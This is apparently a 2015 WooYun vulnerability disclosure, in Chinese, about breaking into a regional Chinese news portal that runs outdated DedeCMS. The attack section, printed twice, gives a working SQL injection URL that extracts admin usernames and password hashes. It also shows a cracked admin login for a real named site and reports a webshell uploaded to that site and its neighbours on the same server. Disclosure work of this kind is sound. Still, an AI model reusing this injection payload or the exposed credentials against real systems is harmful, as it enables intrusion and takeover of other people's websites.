当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2015-138887

漏洞标题: 华声在线某站CMS不升级导致Getshell(同服3站一起打包)

相关厂商: 华声在线

漏洞作者: 路人甲

提交时间: 2015-09-06 09:55

公开时间: 2015-10-21 19:46

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

低级错误

详细说明:

http://gz.voc.com.cn/ 目测是dedecms

google hack一下,果然是

QQ截图20150903220814.jpg



得到后台

看下版本http://gz.voc.com.cn/data/admin/ver.txt 20111015

但是爆不出密码,直接用同服另一个站爆

code 区域
http://gb.voc.com.cn//plus/search.php?keyword=as&typeArr[111%3D@`\%27`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\%27`+]=a





解密后登录



chaochao/1988127



直接上传shell http://gz.voc.com.cn/wooyun.php



http://hbv.voc.com.cn/wooyun.txt

http://jk.voc.com.cn/wooyun.txt

http://gb.voc.com.cn/wooyun.txt

http://gz.voc.com.cn/wooyun.txt



漏洞证明:

http://gz.voc.com.cn/ 目测是dedecms

google hack一下,果然是

QQ截图20150903220814.jpg



得到后台

看下版本http://gz.voc.com.cn/data/admin/ver.txt 20111015

但是爆不出密码,直接用同服另一个站爆

code 区域
http://gb.voc.com.cn//plus/search.php?keyword=as&typeArr[111%3D@`\%27`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\%27`+]=a





解密后登录



chaochao/1988127



直接上传shell http://gz.voc.com.cn/wooyun.php



http://hbv.voc.com.cn/wooyun.txt

http://jk.voc.com.cn/wooyun.txt

http://gb.voc.com.cn/wooyun.txt

http://gz.voc.com.cn/wooyun.txt

修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-06 19:45

厂商回复:

感谢支持。已暂停域名解析,责成使用单位处理,加强系统补丁升级

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录